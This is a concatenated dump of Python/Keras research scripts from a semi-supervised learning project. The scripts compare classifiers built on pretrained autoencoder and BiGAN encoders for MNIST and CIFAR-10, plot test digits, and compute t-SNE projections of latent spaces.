jlr = encoder_model()
bigan = encoder_model()
mod_bigan = encoder_model()
cnn = encoder_model()
vae_encoder = vae_encoder_model()
vae = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std=0.05)
# Load pre-trained weights
model_path = 'Models/mnist'
basic_ae.load_weights(model_path + '_basic_ae_encoder.h5')
dae.load_weights(model_path + '_dae_encoder.h5')
sae.load_weights(model_path + '_sae_encoder.h5')
ce.load_weights(model_path + '_ce_encoder.h5')
aae.load_weights(model_path + '_aae_encoder.h5')
vae.load_weights(model_path + '_vae_encoder.h5')
lr.load_weights(model_path + '_lr_encoder.h5')
jlr.load_weights(model_path + '_jlr_encoder.h5')
bigan.load_weights(model_path + '_bigan_encoder.h5')
mod_bigan.load_weights(model_path + '_posthoc_bigan_encoder.h5')
# Freeze the parameters of all encoders
basic_ae.trainable = False
dae.trainable = False
sae.trainable = False
ce.trainable = False
aae.trainable = False
vae.trainable = False
lr.trainable = False
jlr.trainable = False
bigan.trainable = False
mod_bigan.trainable = False
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
val_split = 1/5.
patience = 10
# Specify training stop criterion and when to save model weights
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# Number of labelled examples to investigate
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 60000]
num_iterations = 5
# Arrays to hold accuracy of classifiers
classifier1_acc = np.zeros(len(num_unlabelled))
classifier2_acc = np.zeros(len(num_unlabelled))
classifier3_acc = np.zeros(len(num_unlabelled))
classifier4_acc = np.zeros(len(num_unlabelled))
classifier5_acc = np.zeros(len(num_unlabelled))
classifier6_acc = np.zeros(len(num_unlabelled))
classifier7_acc = np.zeros(len(num_unlabelled))
classifier8_acc = np.zeros(len(num_unlabelled))
classifier9_acc = np.zeros(len(num_unlabelled))
classifier10_acc = np.zeros(len(num_unlabelled))
classifier11_acc = np.zeros(len(num_unlabelled))
# Loop through each quantity of enquiry
for index, num in enumerate(num_unlabelled):
classifier1_score = 0
classifier2_score = 0
classifier3_score = 0
classifier4_score = 0
classifier5_score = 0
classifier6_score = 0
classifier7_score = 0
classifier8_score = 0
classifier9_score = 0
classifier10_score = 0
classifier11_score = 0
# Reduce size of training sets
reduced_x_train_ae = x_train_ae[0:num, :, :, :]
reduced_x_train_gan = x_train_gan[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# Average classification accuracy over num_iterations readings
for iteration in range(num_iterations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))
# Instantiate classfiers to be trained
classifier1 = mnist_classifier_e_frozen_model(basic_ae)
classifier2 = mnist_classifier_e_frozen_model(dae)
classifier3 = mnist_classifier_e_frozen_model(sae)
classifier4 = mnist_classifier_e_frozen_model(ce)
classifier5 = mnist_classifier_e_frozen_model(vae)
classifier6 = mnist_classifier_e_frozen_model(aae)
classifier7 = mnist_classifier_e_frozen_model(lr)
classifier8 = mnist_classifier_e_frozen_model(jlr)
classifier9 = mnist_classifier_e_frozen_model(bigan)
classifier10 = mnist_classifier_e_frozen_model(mod_bigan)
classifier11 = mnist_classifier_e_trainable_model(cnn)
# Compile models
classifiers = (classifier1, classifier2, classifier3, classifier4, classifier5, classifier6, classifier7,
classifier8, classifier9, classifier10, classifier11)
for classifier in classifiers:
classifier.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# =====================================
# Train models
# =====================================
# Classifier 1
model_checkpoint = ModelCheckpoint('Models/classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier1.fit(reduced_x_train_ae, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier1.load_weights('Models/classifier_1.h5')
score = classifier1.evaluate(x_test_ae, y_test_one_hot, verbose=0)
classifier1_score += score[1]
# Classifier 2
model_checkpoint = ModelCheckpoint('Models/classifier_2.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier2.fit(reduced_x_train_ae, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier2.load_weights('Models/classifier_2.h5')
score = classifier2.evaluate(x_test_ae, y_test_one_hot, verbose=0)
classifier2_score += score[1]
# Classifier 3
model_checkpoint = ModelCheckpoint('Models/classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier3.fit(reduced_x_train_ae, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier3.load_weights('Models/classifier_3.h5')
score = classifier3.evaluate(x_test_ae, y_test_one_hot, verbose=0)
classifier3_score += score[1]
# Classifier 4
model_checkpoint = ModelCheckpoint('Models/classifier_4.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier4.fit(reduced_x_train_ae, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier4.load_weights('Models/classifier_4.h5')
score = classifier4.evaluate(x_test_ae, y_test_one_hot, verbose=0)
classifier4_score += score[1]
# Classifier 5
model_checkpoint = ModelCheckpoint('Models/classifier_5.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier5.fit(reduced_x_train_ae, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier5.load_weights('Models/classifier_5.h5')
score = classifier5.evaluate(x_test_ae, y_test_one_hot, verbose=0)
classifier5_score += score[1]
# Classifier 6
model_checkpoint = ModelCheckpoint('Models/classifier_6.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier6.fit(reduced_x_train_ae, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier6.load_weights('Models/classifier_6.h5')
score = classifier6.evaluate(x_test_ae, y_test_one_hot, verbose=0)
classifier6_score += score[1]
# Classifier 7
model_checkpoint = ModelCheckpoint('Models/classifier_7.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier7.fit(reduced_x_train_gan, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier7.load_weights('Models/classifier_7.h5')
score = classifier7.evaluate(x_test_gan, y_test_one_hot, verbose=0)
classifier7_score += score[1]
# Classifier 8
model_checkpoint = ModelCheckpoint('Models/classifier_8.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier8.fit(reduced_x_train_gan, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier8.load_weights('Models/classifier_8.h5')
score = classifier8.evaluate(x_test_gan, y_test_one_hot, verbose=0)
classifier8_score += score[1]
# Classifier 9
model_checkpoint = ModelCheckpoint('Models/classifier_9.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier9.fit(reduced_x_train_gan, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier9.load_weights('Models/classifier_9.h5')
score = classifier9.evaluate(x_test_gan, y_test_one_hot, verbose=0)
classifier9_score += score[1]
# Classifier 10
model_checkpoint = ModelCheckpoint('Models/classifier_10.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier10.fit(reduced_x_train_gan, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier10.load_weights('Models/classifier_10.h5')
score = classifier10.evaluate(x_test_gan, y_test_one_hot, verbose=0)
classifier10_score += score[1]
# Classifier 11
model_checkpoint = ModelCheckpoint('Models/classifier_11.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier11.fit(reduced_x_train_ae, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier11.load_weights('Models/classifier_11.h5')
score = classifier11.evaluate(x_test_ae, y_test_one_hot, verbose=0)
classifier11_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier1_acc[index] = 100 * classifier1_score / num_iterations
classifier2_acc[index] = 100 * classifier2_score / num_iterations
classifier3_acc[index] = 100 * classifier3_score / num_iterations
classifier4_acc[index] = 100 * classifier4_score / num_iterations
classifier5_acc[index] = 100 * classifier5_score / num_iterations
classifier6_acc[index] = 100 * classifier6_score / num_iterations
classifier7_acc[index] = 100 * classifier7_score / num_iterations
classifier8_acc[index] = 100 * classifier8_score / num_iterations
classifier9_acc[index] = 100 * classifier9_score / num_iterations
classifier10_acc[index] = 100 * classifier10_score / num_iterations
classifier11_acc[index] = 100 * classifier11_score / num_iterations
# Save accuracies to file
np.savetxt('Results/classifier1.txt', classifier1_acc, fmt='%f')
np.savetxt('Results/classifier2.txt', classifier2_acc, fmt='%f')
np.savetxt('Results/classifier3.txt', classifier3_acc, fmt='%f')
np.savetxt('Results/classifier4.txt', classifier4_acc, fmt='%f')
np.savetxt('Results/classifier5.txt', classifier5_acc, fmt='%f')
np.savetxt('Results/classifier6.txt', classifier6_acc, fmt='%f')
np.savetxt('Results/classifier7.txt', classifier7_acc, fmt='%f')
np.savetxt('Results/classifier8.txt', classifier8_acc, fmt='%f')
np.savetxt('Results/classifier9.txt', classifier9_acc, fmt='%f')
np.savetxt('Results/classifier10.txt', classifier10_acc, fmt='%f')
np.savetxt('Results/classifier11.txt', classifier11_acc, fmt='%f')
# Print accuracies
print(classifier1_acc)
print(classifier2_acc)
print(classifier3_acc)
print(classifier4_acc)
print(classifier5_acc)
print(classifier6_acc)
print(classifier7_acc)
print(classifier8_acc)
print(classifier9_acc)
print(classifier10_acc)
print(classifier11_acc) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,501 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_plot_recons.py | import numpy as np
import matplotlib.pyplot as plt
from mnist_mlp_models import encoder_model, generator_model
from functions.data_funcs import get_mnist
import matplotlib.gridspec as gridspec
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_lr'
model_path = 'Models/mnist_lr'
# =====================================
# Load dataset
# =====================================
# Load MNIST data in range [-1,1]
(X_train, _), (X_test, y_test) = get_mnist(gan=True)
# Instantiate models
generator = generator_model(gan=True)
generator.load_weights('Models/mnist_bigan_generator.h5')
encoder = encoder_model()
encoder.load_weights('Models/mnist_bigan_encoder.h5')
# Get initial data examples to train on
classes = np.arange(num_classes)
test_digit_indices = np.empty(0)
# Modify training set to contain set number of labels for each class
for class_index in range(num_classes):
# Generate training set with even class distribution over all labels
indices = [i for i, y in enumerate(y_test) if y == classes[class_index]]
indices = np.asarray(indices)
indices = indices[0:10]
test_digit_indices = np.concatenate((test_digit_indices, indices))
test_digit_indices = test_digit_indices.astype(np.int)
# Generate test and reconstructed digit arrays
X_test = X_test[test_digit_indices]
num_rows = 10
num_cols = 10
plt.figure(figsize=(num_rows, num_cols))
gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=[1,1,1,1,1,1,1,1,1,1],
wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
for i in range(num_rows):
for j in range(num_cols):
im = X_test[i*num_rows + j].reshape(28,28)
ax = plt.subplot(gs[i,j])
plt.imshow(im)
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.savefig('mnist_test_digits')
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,502 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_tsne.py | import os
import sys
import h5py
#import cv2
import math
import random, string
from matplotlib.pyplot import cm
import numpy as np
from scipy.stats import norm
from sklearn import manifold
import matplotlib.pyplot as plt
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.ticker import NullFormatter
from mnist_conv_ae_models import encoder_model
def loadDataset():
from keras.datasets import mnist
(X_train, y_train), (X_test, y_test) = mnist.load_data()
X_train = X_train.reshape([-1, 28, 28, 1]) / 255.
X_test = X_test.reshape([-1, 28, 28, 1]) / 255.
return (X_train, y_train), (X_test, y_test)
# Scatter with images instead of points
def imscatter(x, y, ax, imageData, zoom):
images = []
for i in range(len(x)):
x0, y0 = x[i], y[i]
# Convert to image
img = imageData[i] * 255.
img = img.astype(np.uint8).reshape([imageSize, imageSize])
#img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
# Note: OpenCV uses BGR and plt uses RGB
image = OffsetImage(img, zoom=zoom)
ab = AnnotationBbox(image, (x0, y0), xycoords='data', frameon=False)
images.append(ax.add_artist(ab))
ax.update_datalim(np.column_stack([x, y]))
ax.autoscale()
# Show dataset images with T-sne projection of latent space encoding
def computeTSNEProjectionOfLatentSpace(X, encoder, display=True):
# Compute latent space representation
print("Computing latent space projection...")
X_encoded = encoder.predict(X)
# Compute t-SNE embedding of latent space
print("Computing t-SNE embedding...")
tsne = manifold.TSNE(n_components=3, init='pca', random_state=0)
X_tsne = tsne.fit_transform(X_encoded)
# Plot images according to t-sne embedding
if display:
print("Plotting t-SNE visualization...")
fig, ax = plt.subplots()
imscatter(X_tsne[:, 0], X_tsne[:, 1], imageData=X, ax=ax, zoom=0.6)
plt.show()
else:
return X_tsne
# Show dataset images with T-sne projection of pixel space
def computeTSNEProjectionOfPixelSpace(X, display=True):
# Compute t-SNE embedding of latent space
print("Computing t-SNE embedding...")
tsne = manifold.TSNE(n_components=3, init='pca', random_state=0)
X_tsne = tsne.fit_transform(X.reshape([-1, imageSize * imageSize * 1]))
# Plot images according to t-sne embedding
if display:
print("Plotting t-SNE visualization...")
fig, ax = plt.subplots()
imscatter(X_tsne[:, 0], X_tsne[:, 1], imageData=X, ax=ax, zoom=0.6)
plt.show()
else:
return X_tsne
## Run visualizations
imageSize = 28
# Load dataset to test
print("Loading dataset...")
(X_train, y_train), (X_test, y_test) = loadDataset()
encoder = encoder_model()
encoder.load_weights('mnist_conv_ae_encoder.h5')
computeTSNEProjectionOfLatentSpace(X_test, encoder)
computeTSNEProjectionOfPixelSpace(X_test)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,503 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/bigan/cifar10_bigan_comparison.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from common_models.classifier_models import classifier_e_frozen_model, classifier_e_trainable_model
from semi_supervised_comparison.cifar10_cnn.cifar10_models import deterministic_encoder_model
from functions.data_funcs import get_cifar10
from keras.callbacks import EarlyStopping, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
# Number of labelled examples to investigate
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
num_iterations = 5
# Path that containes pre-trained encoder
pretrained_encoder_path = 'cifar10_bigan_determ_encoder.h5'
# Paths to hold classifier models
classifier_pretrained_frozen_path = 'cifar10_pretrained_frozen_classifier.h5'
classifier_pretrained_trainable_path = 'cifar10_pretrained_trainable.h5'
classifier_random_path = 'cifar10_random.h5'
# =====================================
# Load data
# =====================================
(x_train, y_train), (x_test, y_test) = get_cifar10()
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
# =====================================
# Instantiate models
# =====================================
# Load frozen pretrained encoder model
pretrained_e_frozen = deterministic_encoder_model()
pretrained_e_frozen.load_weights(pretrained_encoder_path)
pretrained_e_frozen.trainable = False
# =====================================
# Training details
# =====================================
# Hyper-parameters and training specification for both models
epochs = 200
batch_size = 128
val_split = 1/5.
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# Arrays to hold accuracy of classifiers
classifier_pretrained_frozen_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
# =====================================
# Train models
# =====================================
# Loop through each quantity of enquiry
for index, num in enumerate(num_unlabelled):
# Set each score to zero
pretrained_frozen_score = 0
pretrained_trainable_score = 0
random_score = 0
# Reduce size of training sets
reduced_x_train = x_train[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# Average classification accuracy a number of random initializations
for iteration in range(num_iterations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))
# ----------------------------
# Instantiate classifiers
# ----------------------------
# Classifier with e learned from autoencoder and frozen
mnist_classifier_pretrained_e_frozen = classifier_e_frozen_model(pretrained_e_frozen)
# Classifier with e learned from autoencoder and not frozen
pretrained_e_trainable = deterministic_encoder_model()
pretrained_e_trainable.load_weights(pretrained_encoder_path)
mnist_classifier_pretrained_e_trainable = classifier_e_trainable_model(pretrained_e_trainable)
# Classifier with randomly initialized e
random_e = deterministic_encoder_model()
mnist_classifier_random_e = classifier_e_trainable_model(random_e)
# ----------------------------
# Inspect trainable weights
# ----------------------------
# Print details of trainable and non-trainable weights of models
if index == 0 and iteration == 0:
# Print number of trainable and non-trainable parameters for each classifier
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_frozen.non_trainable_weights)]))
print('Classifier w/ Frozen Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable parameters: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e_trainable.non_trainable_weights)]))
print('\nClassifier w/ Trainable Pretrained Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable paramseter: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_random_e.non_trainable_weights)]))
print('\nClassifier w/ Random Encoder + FC Layers')
print('Total parameters: ' + str(trainable_count + non_trainable_count))
print('Trainable paramseter: ' + str(trainable_count))
print('Non-trainable parameters: ' + str(non_trainable_count))
# ----------------------------
# Compile models
# ----------------------------
mnist_classifier_pretrained_e_frozen.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_pretrained_e_trainable.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_random_e.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
# ----------------------------
